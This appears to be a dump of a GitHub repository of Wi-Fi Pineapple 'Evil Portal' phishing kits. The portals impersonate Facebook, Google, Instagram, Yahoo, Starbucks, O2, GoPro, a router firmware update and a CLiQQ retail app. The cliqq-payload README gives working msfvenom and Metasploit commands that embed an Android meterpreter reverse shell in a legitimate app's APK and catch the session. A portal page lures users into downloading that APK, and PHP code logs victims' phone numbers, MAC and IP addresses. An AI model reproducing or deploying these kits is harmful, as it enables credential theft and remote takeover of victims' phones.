
16 |
Your GoPro is updating...
17 |
22 |
├── Evil Portals └── portals │ ├── cliqq-payload │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── README.md │ ├── assets │ │ ├── css │ │ │ └── wifi.css │ │ └── img │ │ │ ├── 7-11.ico │ │ │ ├── auto-sign-in.png │ │ │ └── cliqqwifi.png │ ├── cliqq-payload.ep │ ├── helper.php │ ├── index.php │ └── jquery-2.2.1.min.js │ ├── device-modal │ ├── config.ini │ └── html │ │ ├── index.html │ │ └── static │ │ ├── css │ │ └── framework7.material.min.css │ │ ├── fonts │ │ ├── segoeui-bold.ttf │ │ └── segoeui.ttf │ │ ├── js │ │ ├── framework7.min.js │ │ └── kitchen-sink.js │ │ └── libs │ │ └── jquery.min.js │ ├── facebook-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── assets │ │ ├── css │ │ │ ├── PGNbJWSeFxY.css │ │ │ └── fBTqFRkifHK.css │ │ └── img │ │ │ ├── 1lDsteNqRLb.png │ │ │ ├── O2aKM2iSbOw.png │ │ │ └── dF5SId3UHWd.svg │ ├── config.ini │ ├── facebook-login.ep │ ├── helper.php │ ├── html │ │ ├── index.html │ │ ├── loading.html │ │ └── static │ │ │ ├── css │ │ │ ├── PGNbJWSeFxY.css │ │ │ └── fBTqFRkifHK.css │ │ │ ├── img │ │ │ ├── 1lDsteNqRLb.png │ │ │ ├── O2aKM2iSbOw.png │ │ │ └── dF5SId3UHWd.svg │ │ │ └── js │ │ │ └── jquery-3.5.1.min.js │ └── index.php │ ├── firmware_upgrade_2 │ ├── config.ini │ └── html │ │ ├── css │ │ └── style.css │ │ ├── fonts │ │ ├── Lato-Bold.eot │ │ ├── Lato-Bold.ttf │ │ ├── Lato-Bold.woff │ │ ├── Lato-Bold.woff2 │ │ ├── Lato-BoldItalic.eot │ │ ├── Lato-BoldItalic.ttf │ │ ├── Lato-Regular.eot │ │ ├── Lato-Regular.ttf │ │ ├── Lato-Regular.woff │ │ └── Lato-Regular.woff2 │ │ ├── img │ │ ├── SVG │ │ │ ├── bug.svg │ │ │ ├── connection.svg │ │ │ ├── meter.svg │ │ │ └── shield.svg │ │ ├── favicon.png │ │ ├── sea-large.jpg │ │ ├── sea-small.jpg │ │ ├── sprites.svg │ │ └── stars.jpg │ │ ├── index.html │ │ └── js │ │ └── script.js │ ├── google-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── README.md │ ├── assets │ │ ├── css │ │ │ ├── bootstrap.min.css │ │ │ ├── custom.css │ │ │ └── progress-bar.css │ │ ├── fonts │ │ │ ├── OpenSans-Regular.ttf │ │ │ └── Roboto-Regular.ttf │ │ ├── images │ │ │ └── favicon.ico │ │ └── js │ │ │ ├── bootstrap.min.js │ │ │ ├── custom.js │ │ │ ├── jquery-3.4.1.min.js │ │ │ └── jquery-ui.min.js │ ├── config.ini │ ├── google-login.ep │ ├── helper.php │ ├── html │ │ ├── index.html │ │ ├── loading.html │ │ └── static │ │ │ ├── css │ │ │ ├── bootstrap.min.css │ │ │ ├── custom.css │ │ │ └── progress-bar.css │ │ │ ├── fonts │ │ │ ├── OpenSans-Regular.ttf │ │ │ └── Roboto-Regular.ttf │ │ │ ├── img │ │ │ └── favicon.ico │ │ │ └── js │ │ │ ├── bootstrap.min.js │ │ │ ├── custom.js │ │ │ ├── jquery-3.4.1.min.js │ │ │ └── jquery-ui.min.js │ └── index.php │ ├── gopro-phish │ ├── config.ini │ └── html │ │ ├── index.html │ │ ├── loading.html │ │ └── static │ │ ├── attention.png │ │ ├── bootstrap.min.css │ │ ├── bootstrap.min.js │ │ ├── goproInc-light.woff │ │ ├── goproInc-medium.woff │ │ ├── jquery.min.js │ │ ├── logo.jpg │ │ └── style.css │ ├── instagram-login │ ├── MyPortal.php │ ├── assets │ │ ├── css │ │ │ ├── 0608bd6190e0.css │ │ │ ├── 1b39124c7396.css │ │ │ ├── 344096cb1b73.css │ │ │ ├── 6c761c8cd379.css │ │ │ ├── c71018ea1251.css │ │ │ └── style.css │ │ ├── img │ │ │ ├── 177140221987.jpg │ │ │ ├── 180ae7a0bcf7.png │ │ │ ├── 32f0a4f27407.png │ │ │ ├── 36b3ee2d91ed.ico │ │ │ ├── 43cc71bb1b43.png │ │ │ ├── 5e04169b9308.jpg │ │ │ ├── 9144d6673849.jpg │ │ │ ├── 9364675fb26a.png │ │ │ ├── b27a108592d8.jpg │ │ │ ├── bcd90c1d4868.png │ │ │ ├── e9cd846dc748.png │ │ │ └── ff2c097a681e.jpg │ │ └── js │ │ │ └── jquery-3.5.1.min.js │ ├── config.ini │ ├── helper.php │ ├── html │ │ ├── index.html │ │ └── static │ │ │ ├── css │ │ │ ├── 0608bd6190e0.css │ │ │ ├── 1b39124c7396.css │ │ │ ├── 344096cb1b73.css │ │ │ ├── 6c761c8cd379.css │ │ │ ├── c71018ea1251.css │ │ │ └── style.css │ │ │ ├── img │ │ │ ├── 177140221987.jpg │ │ │ ├── 180ae7a0bcf7.png │ │ │ ├── 32f0a4f27407.png │ │ │ ├── 36b3ee2d91ed.ico │ │ │ ├── 43cc71bb1b43.png │ │ │ ├── 5e04169b9308.jpg │ │ │ ├── 9144d6673849.jpg │ │ │ ├── 9364675fb26a.png │ │ │ ├── b27a108592d8.jpg │ │ │ ├── bcd90c1d4868.png │ │ │ ├── e9cd846dc748.png │ │ │ └── ff2c097a681e.jpg │ │ │ └── js │ │ │ └── jquery-3.5.1.min.js │ ├── index.php │ └── instagram-login.ep │ ├── o2-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── assets │ │ ├── css │ │ │ ├── fonts.css │ │ │ ├── normalize.min.css │ │ │ └── style.css │ │ ├── fonts │ │ │ ├── Lato-700.woff2 │ │ │ └── Lato-regular.woff2 │ │ └── img │ │ │ ├── logo-o2.svg │ │ │ ├── logo-white.png │ │ │ └── ymwp832k1s.png │ ├── helper.php │ ├── index.php │ ├── jquery-2.2.1.min.js │ ├── license.txt │ └── o2-login.ep │ ├── starbucks-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── assets │ │ ├── css │ │ │ ├── bootstrap.min.css │ │ │ └── style.css │ │ └── img │ │ │ ├── 5atoko1sqg.png │ │ │ ├── pa6dyy5wcc.png │ │ │ └── s5g1cxz9vr.png │ ├── config.ini │ ├── helper.php │ ├── html │ │ ├── index.html │ │ ├── license.txt │ │ ├── loading.html │ │ └── static │ │ │ ├── css │ │ │ ├── bootstrap.min.css │ │ │ └── style.css │ │ │ ├── img │ │ │ ├── 5atoko1sqg.png │ │ │ ├── pa6dyy5wcc.png │ │ │ └── s5g1cxz9vr.png │ │ │ └── js │ │ │ ├── index.js │ │ │ └── jquery.min.js │ ├── index.php │ ├── jquery-2.2.1.min.js │ └── starbucks-login.ep │ ├── twitter-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── assets │ │ ├── css │ │ │ ├── bootstrap.min.css │ │ │ └── style.css │ │ └── img │ │ │ ├── j35g5c9082.png │ │ │ └── oxvhareuw0.png │ ├── helper.php │ ├── index.php │ ├── jquery-2.2.1.min.js │ └── twitter-login.ep │ └── yahoo-login │ ├── .disable │ ├── .enable │ ├── MyPortal.php │ ├── assets │ ├── css │ │ └── yahoo-main.css │ ├── fonts │ │ ├── Yahoo_Sans-Medium.woff2 │ │ ├── Yahoo_Sans-Regular.woff2 │ │ └── Yahoo_Sans-Semibold.woff2 │ └── img │ │ ├── yahoo-apple-touch-v0.0.2.png │ │ ├── yahoo-favicon-img-v0.0.2.ico │ │ ├── yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png │ │ └── yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png │ ├── config.ini │ ├── helper.php │ ├── html │ ├── index.html │ ├── loading.html │ └── static │ │ ├── css │ │ └── yahoo-main.css │ │ ├── fonts │ │ ├── Yahoo_Sans-Medium.woff2 │ │ ├── Yahoo_Sans-Regular.woff2 │ │ └── Yahoo_Sans-Semibold.woff2 │ │ ├── img │ │ ├── yahoo-apple-touch-v0.0.2.png │ │ ├── yahoo-favicon-img-v0.0.2.ico │ │ ├── yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png │ │ └── yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png │ │ └── js │ │ └── jquery-3.5.1.min.js │ ├── index.php │ └── yahoo-login.ep ├── Kismet ├── dependencyInstall.sh ├── wardrive.sh └── wardriveUSB.sh ├── Screenshots ├── Activated.PNG ├── EvilPortal.PNG ├── EvilPortalPage.PNG ├── EvilPortalPin.PNG ├── GoogleEx.PNG ├── Pin.PNG ├── TestCreds.PNG └── plugin.PNG └── readme.md /Evil Portals/portals/cliqq-payload/.disable: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Commands in this file are ran when a portal is de-activated. 4 | # You can use any interpreter you want to, the default is bash. -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/.enable: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Commands in this file are ran when a portal is activated and when Evil Portal startsup on boot. 4 | # You can use any interpreter you want to, the default is bash. -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/MyPortal.php: -------------------------------------------------------------------------------- 1 | getFileName()); 16 | file_put_contents("{$logPath}/.logs", "[" . date('Y-m-d H:i:s') . "Z]\n" . "mobileNumber: {$mobileNumber}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND); 17 | $this->execBackground("notify $mobileNumber"); 18 | } 19 | // handle form input or other extra things there 20 | 21 | // Call parent to handle basic authorization first 22 | parent::handleAuthorization(); 23 | 24 | } 25 | 26 | public function onSuccess() 27 | { 28 | // Calls default success message 29 | parent::onSuccess(); 30 | } 31 | 32 | public function showError() 33 | { 34 | // Calls default error message 35 | parent::showError(); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/README.md: -------------------------------------------------------------------------------- 1 | ## CLiQQ WiFi payload distributor 2 | 3 | ### Usage 4 | Include this line on /etc/nginx/mime.types and then reboot the Pineapple or else the browser will parse the apk file into plain text 5 | 6 | application/vnd.android.package-archive apk; 7 | 8 | Embedding payload on [original apk file](https://apkpure.com/cliqq-every-day-rewards/com.philseven.loyalty) 9 | 10 | msfvenom -x CLiQQ.apk -p android/meterpreter/reverse_tcp LHOST=172.16.42.42 LPORT=4444 -o CLiQQ_final.apk 11 | 12 | Moving and renaming the modified apk file to the Pineapple 13 | 14 | scp CLiQQ_final.apk root@172.16.42.1:/sd/portals/cliqq-payload/CLiQQ.apk 15 | 16 | Starting Metasploit listener 17 | 18 | msfconsole 19 | 20 | use multi/handler 21 | 22 | set payload android/meterpreter/reverse_tcp 23 | 24 | set LHOST 172.16.42.42 25 | 26 | set LPORT 4444 27 | 28 | set ExitOnSession false 29 | 30 | exploit -j -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/assets/img/7-11.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ScriptTactics/PineappleMk7-Scripts/1abfd5b413c58424ed6db640c8e9ddd6056e7625/Evil Portals/portals/cliqq-payload/assets/img/7-11.ico -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/assets/img/auto-sign-in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ScriptTactics/PineappleMk7-Scripts/1abfd5b413c58424ed6db640c8e9ddd6056e7625/Evil Portals/portals/cliqq-payload/assets/img/auto-sign-in.png -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/assets/img/cliqqwifi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ScriptTactics/PineappleMk7-Scripts/1abfd5b413c58424ed6db640c8e9ddd6056e7625/Evil Portals/portals/cliqq-payload/assets/img/cliqqwifi.png -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/cliqq-payload.ep: -------------------------------------------------------------------------------- 1 | {"name":"cliqq-payload","type":"basic"} -------------------------------------------------------------------------------- /Evil Portals/portals/cliqq-payload/helper.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | 8 |
9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 25 |If you have the CLiQQ app, you are automatically signed in. You may 36 | close this window now.
37 | 38 |For Android phone users, if you don't have the CLiQQ app, you may 39 | click on the link below to download the APK
40 | 41 | 44 | Download here 45 |Or you may use manual sign-in below to get internet access and 48 | download the app from Play Store or App Store.
49 |If the auto-sign-in is enabled, you are automatically signed in when you enter a CLiQQ WiFi hotspot. Make sure the WiFi switch is set to ON.
59 |For the best experience, download the app to enable auto-sign-in. 68 | Tap on the button below to gain internet access and download the CLiQQ app from the app store.
69 |39 | This update will extend your wireless range to unprecedented levels. We have 40 | worked very hard to make sure that you can access WIFI 41 | no matter where you go. Now you can access internet in 42 | your basement or even the rooftop. 43 |
44 |50 | This update will increase your WIFI speeds so you can enjoy it without waiting 51 | for website to load. Say goodbye to slow connections 52 | and experience a new way of connecting to the internet. 53 | 54 |
55 |61 | This update will fix many bugs that are currently in the system which will provide 62 | you with a seamless experience. Therefore they router 63 | should no longer crash and stay up and running 99.99% 64 | of the time. 65 |
66 |72 | Many new security features were added in this update to make sure you and your 73 | family are safe while browsing the internet. One notable 74 | feature is better parental support so you can easily 75 | control what your children do online. 76 |
77 |